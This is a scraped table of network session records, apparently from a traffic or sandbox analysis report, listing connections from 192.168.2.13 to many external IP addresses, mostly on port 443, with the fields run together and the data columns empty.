                                    10573192.168.2.1355770178.118.2.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10574192.168.2.1344732154.228.226.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10575192.168.2.1354148174.30.177.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10576192.168.2.1339596153.220.250.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10577192.168.2.1332912166.183.164.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10578192.168.2.1338606133.73.84.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10579192.168.2.1352088192.150.68.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10580192.168.2.1334480201.200.194.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10581192.168.2.1347064148.195.126.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10582192.168.2.133396039.72.5.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10583192.168.2.135232077.147.126.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10584192.168.2.1349598218.7.196.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10585192.168.2.1358480152.151.35.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10586192.168.2.1344572195.173.126.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10587192.168.2.1340200180.219.8.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10588192.168.2.1359508144.185.187.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10589192.168.2.135139885.193.172.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10590192.168.2.135294888.96.136.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10591192.168.2.1344836164.222.53.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10592192.168.2.135433268.227.79.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10593192.168.2.136024836.121.101.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10594192.168.2.1351582194.160.98.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10595192.168.2.1332854136.243.204.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10596192.168.2.1346500113.101.197.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10597192.168.2.1337678207.63.27.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10598192.168.2.1339422190.45.187.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10599192.168.2.1335188143.43.199.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10600192.168.2.134945493.204.212.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10601192.168.2.1350468130.89.11.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10602192.168.2.134600447.224.184.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10603192.168.2.134985852.96.218.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10604192.168.2.1352316212.66.141.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10605192.168.2.135428613.26.104.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10606192.168.2.1349228104.70.25.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10607192.168.2.1347540107.222.167.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10608192.168.2.133879081.229.19.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10609192.168.2.1356444206.45.192.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10610192.168.2.1360768167.54.79.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10611192.168.2.1356002135.72.94.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10612192.168.2.135245412.204.229.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10613192.168.2.1335314179.23.30.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10614192.168.2.135651434.55.74.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10615192.168.2.1360826173.208.48.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10616192.168.2.134137096.15.24.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10617192.168.2.1340242143.165.95.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10618192.168.2.1333838219.160.131.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10619192.168.2.134277495.237.217.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10620192.168.2.1358020220.85.134.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10621192.168.2.1346682198.148.40.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10622192.168.2.1339778106.252.46.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10623192.168.2.1360054172.197.235.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10624192.168.2.1349886193.240.59.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10625192.168.2.1339386174.173.29.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10626192.168.2.1339912160.81.100.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10627192.168.2.1353000156.41.234.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10628192.168.2.1332824158.141.148.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10629192.168.2.1348724193.119.63.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10630192.168.2.1351024196.136.229.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10631192.168.2.134594432.83.78.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10632192.168.2.134475240.237.10.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10633192.168.2.1349114133.251.188.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10634192.168.2.133403248.9.214.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10635192.168.2.1353540165.4.2.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10636192.168.2.13561524.126.165.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10637192.168.2.135564844.232.176.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10638192.168.2.133840460.226.36.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10639192.168.2.1335094187.31.173.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10640192.168.2.134624294.121.135.2228080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10641192.168.2.13592745.183.79.18080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10642192.168.2.135436691.95.86.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10643192.168.2.1359660197.173.255.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10644192.168.2.1353784185.210.154.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10645192.168.2.1349108166.118.145.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10646192.168.2.1333692141.180.208.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10647192.168.2.1349906146.134.196.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10648192.168.2.1344246184.19.131.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10649192.168.2.1359634212.59.14.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10650192.168.2.1336388196.4.80.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10651192.168.2.1355730166.145.185.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10652192.168.2.1348860153.51.105.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10653192.168.2.1337090120.158.205.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10654192.168.2.1358322206.149.216.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10655192.168.2.1340548166.61.243.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10656192.168.2.1342184133.175.32.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10657192.168.2.134959837.242.75.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10658192.168.2.135311673.120.157.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10659192.168.2.1339566208.12.76.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10660192.168.2.1351712134.193.188.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10661192.168.2.134493090.87.84.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10662192.168.2.1355482207.79.31.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10663192.168.2.134149099.149.116.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10664192.168.2.134463692.89.50.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10665192.168.2.133782471.153.151.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10666192.168.2.1351058147.39.62.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10667192.168.2.1335334109.222.135.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10668192.168.2.1336360151.16.68.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10669192.168.2.134303235.214.141.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10670192.168.2.1334460118.164.48.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10671192.168.2.1333118153.178.119.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10672192.168.2.1338064191.63.221.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10673192.168.2.1339652101.106.94.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10674192.168.2.134085270.138.11.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10675192.168.2.1357502120.161.134.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10676192.168.2.1344804118.124.161.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10677192.168.2.1342814141.40.4.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10678192.168.2.134899840.94.177.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10679192.168.2.1350190157.89.69.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10680192.168.2.13415081.105.80.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10681192.168.2.136057241.86.61.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10682192.168.2.13523484.10.176.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10683192.168.2.1357468180.90.218.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10684192.168.2.1357654119.111.135.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10685192.168.2.13420745.135.85.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10686192.168.2.133889413.204.68.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10687192.168.2.1353712162.204.109.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10688192.168.2.1337872118.17.106.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10689192.168.2.1336824156.60.155.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10690192.168.2.1353470130.14.251.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10691192.168.2.135004671.227.75.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10692192.168.2.1334700111.61.64.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10693192.168.2.1358638134.164.99.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10694192.168.2.1344268183.31.26.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10695192.168.2.135878672.209.52.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10696192.168.2.134235243.21.45.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10697192.168.2.135584449.11.178.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10698192.168.2.1339612218.126.83.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10699192.168.2.1358652220.93.253.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10700192.168.2.1359468158.222.217.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10701192.168.2.134573875.22.175.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10702192.168.2.134169673.25.189.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10703192.168.2.1351206186.14.183.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10704192.168.2.135417290.235.63.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10705192.168.2.1353930217.59.158.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10706192.168.2.1335188204.94.200.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10707192.168.2.135647439.184.169.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10708192.168.2.1355926112.144.207.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10709192.168.2.135066060.26.103.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10710192.168.2.1337494188.27.250.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10711192.168.2.1348490133.42.51.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10712192.168.2.1357416165.85.202.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10713192.168.2.1344714198.228.168.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10714192.168.2.1350016134.78.145.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10715192.168.2.135792274.165.182.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10716192.168.2.1351806129.160.111.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10717192.168.2.1356684197.124.10.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10718192.168.2.134441418.171.141.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10719192.168.2.1353138163.143.237.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10720192.168.2.1352640101.81.158.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10721192.168.2.134089481.175.61.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10722192.168.2.134621054.97.17.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10723192.168.2.1356926109.208.18.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10724192.168.2.1344604130.147.186.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10725192.168.2.1350824191.139.90.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10726192.168.2.1348474128.53.160.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10727192.168.2.1340014180.29.100.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10728192.168.2.134090662.171.73.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10729192.168.2.134493499.213.87.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10730192.168.2.1345442113.90.29.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10731192.168.2.1333312102.198.166.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10732192.168.2.135509688.207.56.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10733192.168.2.133696684.13.138.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10734192.168.2.1345210169.231.99.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10735192.168.2.134952688.107.204.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10736192.168.2.135714851.89.185.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10737192.168.2.1350088171.174.139.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10738192.168.2.1344158211.132.171.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10739192.168.2.1350066168.4.252.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10740192.168.2.1336452201.166.196.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10741192.168.2.134574054.252.238.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10742192.168.2.134811684.206.144.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10743192.168.2.1346508112.145.49.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10744192.168.2.135985485.81.199.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10745192.168.2.134135023.117.159.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10746192.168.2.1339228206.63.67.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10747192.168.2.1350556175.61.54.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10748192.168.2.1351230105.194.162.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10749192.168.2.1334764177.196.42.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10750192.168.2.1340772106.166.18.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10751192.168.2.1336164209.8.244.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10752192.168.2.135337280.41.252.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10753192.168.2.134666048.223.47.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10754192.168.2.133281082.114.96.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10755192.168.2.135063279.255.158.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10756192.168.2.135846249.32.42.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10757192.168.2.1356548107.36.253.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10758192.168.2.1352432118.51.105.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10759192.168.2.1337428175.38.207.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10760192.168.2.1354374219.124.226.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10761192.168.2.133674619.216.135.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10762192.168.2.1335462144.22.160.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10763192.168.2.1353346147.161.229.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10764192.168.2.1336186185.176.125.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10765192.168.2.1357842108.79.13.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10766192.168.2.1346338169.174.81.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10767192.168.2.1345140170.183.70.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10768192.168.2.135729068.52.172.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10769192.168.2.1356500133.227.103.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10770192.168.2.1333472106.152.80.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10771192.168.2.1348740114.142.98.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10772192.168.2.133998624.92.0.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10773192.168.2.133411293.4.72.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10774192.168.2.133667035.45.146.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10775192.168.2.1349384162.246.233.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10776192.168.2.1348640193.42.19.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10777192.168.2.1340892184.104.158.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10778192.168.2.1345936121.82.48.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10779192.168.2.1355966130.100.241.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10780192.168.2.136085247.71.150.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10781192.168.2.1339562137.164.114.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10782192.168.2.1342074198.9.233.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10783192.168.2.135752899.28.240.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10784192.168.2.134565023.220.255.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10785192.168.2.135570454.51.55.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10786192.168.2.135116024.16.123.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10787192.168.2.1356614172.42.220.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10788192.168.2.133704441.169.83.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10789192.168.2.1333820148.132.171.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10790192.168.2.133289625.82.90.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10791192.168.2.1333772107.38.145.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10792192.168.2.1356896200.35.254.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10793192.168.2.1353944155.211.61.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10794192.168.2.1336522198.27.92.74443
                                    TimestampBytes transferredDirectionData


